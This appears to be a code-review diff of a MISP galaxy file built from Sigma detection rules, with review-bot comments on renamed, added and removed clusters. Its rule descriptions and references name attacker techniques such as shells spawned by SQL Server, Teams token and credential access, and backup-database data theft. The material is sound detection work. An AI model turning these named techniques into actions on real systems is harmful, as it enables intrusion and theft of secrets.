+ "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
"https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml"
],
@@ -63564,7 +60947,7 @@
"value": "Windows Credential Manager Access via VaultCmd"
},
{
- "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection",
+ "description": "Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.",
"meta": {
"author": "FPT.EagleEye Team, wagga",
"creation_date": "2020/12/11",
@@ -63601,7 +60984,7 @@
}
],
"uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445",
- "value": "Suspicious Shells Spawn by SQL Server"
+ "value": "Suspicious Child Process Of SQL Server"
},
{
"description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL",
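Review bot: renaming "value" from "Suspicious Shells Spawn by SQL Server" to "Suspicious Child Process Of SQL Server" changes the galaxy tag string that MISP derives from this cluster, even though the uuid 869b9ca7-9ea2-4a5a-8325-e80e62f75445 stays the same, so existing tag-based searches and correlation rules built on the old name will stop matching. Suggest recording the old name in a "synonyms" entry under "meta" (or at least calling out the rename in the PR description); the same applies to the "Suspicious Invoke-WebRequest Usage" to "Suspicious Invoke-WebRequest Execution" rename further down.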
@@ -63795,8 +61178,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://learn.microsoft.com/en-us/windows/package-manager/winget/source",
+ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml"
],
"tags": [
@@ -63864,8 +61247,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html",
"https://github.com/fireeye/DueDLLigence",
+ "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html",
"https://lolbas-project.github.io/lolbas/Binaries/Rasautou/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml"
],
@@ -63932,8 +61315,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
"https://twitter.com/pabraeken/status/993497996179492864",
+ "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml"
],
"tags": [
@@ -64163,8 +61546,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md",
"https://github.com/OTRF/detection-hackathon-apt29/issues/6",
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml"
],
"tags": [
@@ -64255,8 +61638,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/986280382042595328",
"https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html",
+ "https://twitter.com/mattifestation/status/986280382042595328",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"
],
"tags": [
@@ -64332,7 +61715,7 @@
}
],
"uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc",
- "value": "Suspicious Invoke-WebRequest Usage"
+ "value": "Suspicious Invoke-WebRequest Execution"
},
{
"description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)",
@@ -64381,8 +61764,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/",
"https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml"
],
"tags": [
@@ -64439,10 +61822,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/JohnLaTwC/status/1415295021041979392",
"https://vms.drweb.fr/virus/?i=24144899",
- "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1",
"https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
+ "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1",
+ "https://twitter.com/JohnLaTwC/status/1415295021041979392",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml"
],
"tags": [
@@ -64475,8 +61858,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf",
"https://sourceforge.net/projects/mouselock/",
+ "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml"
],
"tags": [
@@ -64510,8 +61893,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml"
],
"tags": [
@@ -64565,56 +61948,6 @@
"uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d",
"value": "Download Arbitrary Files Via MSOHTMED.EXE"
},
- {
- "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2018/02/22",
- "falsepositive": [
- "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)"
- ],
- "filename": "proc_creation_win_exploit_cve_2017_0261.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1203",
- "attack.t1204.002",
- "attack.initial_access",
- "attack.t1566.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833",
- "value": "Exploit for CVE-2017-0261"
- },
{
"description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline",
"meta": {
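Review bot: the cluster for "Exploit for CVE-2017-0261" (uuid 864403a1-36c9-40a2-a982-4c9a45f7d833) is removed here together with its three "related" links (be2dcee9-a7a7-4e38-afd6-21b31ecc3d63, 232b7f21-adf9-4b42-b936-b9d6f7df856e, 2e34237d-8574-43f6-aace-ae2915de8597), and the same happens to "Exploit for CVE-2015-1641" a few hunks below. These are old rules that were most likely moved to a deprecated folder upstream; if the generator only walks the active rule tree, please say so in the PR description, because a reader of this diff cannot tell a deliberate upstream deprecation from a generator regression.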
@@ -64629,9 +61962,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
"https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml"
],
"tags": [
@@ -64655,9 +61988,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf",
"https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html",
"https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors",
+ "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml"
],
"tags": [
@@ -64782,7 +62115,7 @@
{
"description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.",
"meta": {
- "author": "Timur Zinniatullin, oscd.community",
+ "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel",
"creation_date": "2019/10/21",
"falsepositive": [
"WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.",
@@ -64896,8 +62229,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
"https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html",
+ "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml"
],
"tags": [
@@ -65004,6 +62337,49 @@
"uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35",
"value": "Suspicious Obfuscated PowerShell Code"
},
+ {
+ "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence",
+ "meta": {
+ "author": "Swachchhanda Shrawan Poudel, Elastic (idea)",
+ "creation_date": "2023/04/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-",
+ "https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1036.005",
+ "attack.t1053.005"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c",
+ "value": "Suspicious Scheduled Task Creation via Masqueraded XML File"
+ },
{
"description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.",
"meta": {
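Review bot: in the new cluster the description reads "could be indicative of potential defense evasion attempt during persistence", which is missing an article ("a potential defense evasion attempt") and, unlike its neighbours, ends without a period; since this text is copied from the upstream rule, the fix belongs in the Sigma repository, but it is worth flagging there. The rest of the entry is consistent: the two dest-uuids under "related" (1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 and 005a06c6-14bf-4118-afa0-ebcd8aebb0c9) line up with the attack.t1036.005 and attack.t1053.005 tags, and 1c4e5d32 is the same uuid the removed CVE-2015-1641 entry used for t1036.005.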
@@ -65017,10 +62393,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
"https://twitter.com/Alh4zr3d/status/1580925761996828672",
"https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml"
],
"tags": [
@@ -65042,40 +62418,6 @@
"uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0",
"value": "Service DACL Abuse To Hide Services Via Sc.EXE"
},
- {
- "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2018/02/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2015_1641.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/",
- "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef",
- "value": "Exploit for CVE-2015-1641"
- },
{
"description": "Detects a suspicious execution from an uncommon folder",
"meta": {
@@ -65090,9 +62432,9 @@
"logsource.product": "windows",
"refs": [
"https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md",
+ "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
"https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt",
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
- "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml"
],
"tags": [
@@ -65125,8 +62467,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf",
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
+ "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml"
],
"tags": [
@@ -65225,8 +62567,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
"https://twitter.com/bopin2020/status/1366400799199272960",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml"
],
"tags": [
@@ -65287,40 +62629,6 @@
"uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b",
"value": "RunDLL32 Spawning Explorer"
},
- {
- "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community",
- "creation_date": "2020/07/30",
- "falsepositive": [
- "Legitimate setups that use similar flags"
- ],
- "filename": "proc_creation_win_apt_winnti_pipemon.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002",
- "attack.g0044"
- ]
- },
- "related": [
- {
- "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "73d70463-75c9-4258-92c6-17500fe972f2",
- "value": "Winnti Pipemon Characteristics"
- },
{
"description": "Detects suspicious powershell command line parameters used in Empire",
"meta": {
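Review bot: removing "Winnti Pipemon Characteristics" (uuid 73d70463-75c9-4258-92c6-17500fe972f2) also drops its attack.g0044 tag, which is the only thing tying this detection to the Winnti threat-actor entry in the ATT&CK groups galaxy; the "Equation Group DLL_U Export Function Load" removal further down loses attack.g0020 in the same way. If these rules are gone upstream the removal is correct, but the loss of actor cross-links is worth a line in the PR description so galaxy consumers know why those relationships vanished.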
@@ -65335,8 +62643,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
"https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml"
],
@@ -65403,9 +62711,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/",
"https://twitter.com/_felamos/status/1204705548668555264",
"https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"
],
"tags": [
@@ -65459,6 +62767,39 @@
"uuid": "5687f942-867b-4578-ade7-1e341c46e99a",
"value": "VMToolsd Suspicious Child Process"
},
+ {
+ "description": "Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_sqlcmd_veeam_db_recon.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1005"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "696bfb54-227e-4602-ac5b-30d9d2053312",
+ "value": "Veeam Backup Database Suspicious Query"
+ },
{
"description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.",
"meta": {
@@ -65472,8 +62813,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
"https://github.com/harleyQu1nn/AggressorScripts",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml"
],
"tags": [
@@ -65578,41 +62919,6 @@
"uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde",
"value": "Windows Shell/Scripting Processes Spawning Suspicious Programs"
},
- {
- "description": "Detects a specific export function name used by one of EquationGroup tools",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/03/04",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/cyb3rops/status/972186477512839170",
- "https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml"
- ],
- "tags": [
- "attack.g0020",
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e",
- "value": "Equation Group DLL_U Export Function Load"
- },
{
"description": "Detects inline execution of PowerShell code from a file",
"meta": {
@@ -65718,8 +63024,8 @@
"logsource.product": "windows",
"refs": [
"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
- "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/",
+ "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"
],
@@ -65788,8 +63094,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens",
+ "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml"
],
"tags": [
@@ -65898,8 +63204,8 @@
"logsource.product": "windows",
"refs": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/",
- "https://twitter.com/bohops/status/1477717351017680899?s=12",
"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340",
+ "https://twitter.com/bohops/status/1477717351017680899?s=12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"
],
"tags": [
@@ -65922,9 +63228,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
"https://twitter.com/0gtweet/status/1564968845726580736",
"https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html",
+ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"
],
"tags": [
@@ -65956,7 +63262,7 @@
{
"description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)",
"meta": {
- "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io",
+ "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io",
"creation_date": "2018/04/06",
"falsepositive": [
"Unknown"
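Review bot: the "author" string of this element changes attribution, not just order: the duplicated "Michael Haag" entry is collapsed to one, "Elastic" and the "SCYTHE" prefix before "@scythe_io" are dropped, and "(Nextron Systems)" is added after Florian Roth. This is presumably a refresh from the upstream rule metadata, but since it is the only author edit in the patch it should be called out in the commit message rather than left to be discovered in a 3000-line diff.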
@@ -65966,17 +63272,17 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A",
+ "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html",
+ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml",
"https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
"https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
- "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/",
- "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
"https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set",
- "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml",
"https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
"https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml",
- "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A",
+ "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/",
+ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
"https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
- "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml"
],
"tags": [
@@ -66027,10 +63333,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/cyb3rops/status/1186631731543236608",
"https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/",
"https://github.com/Neo23x0/DLLRunner",
"https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://twitter.com/cyb3rops/status/1186631731543236608",
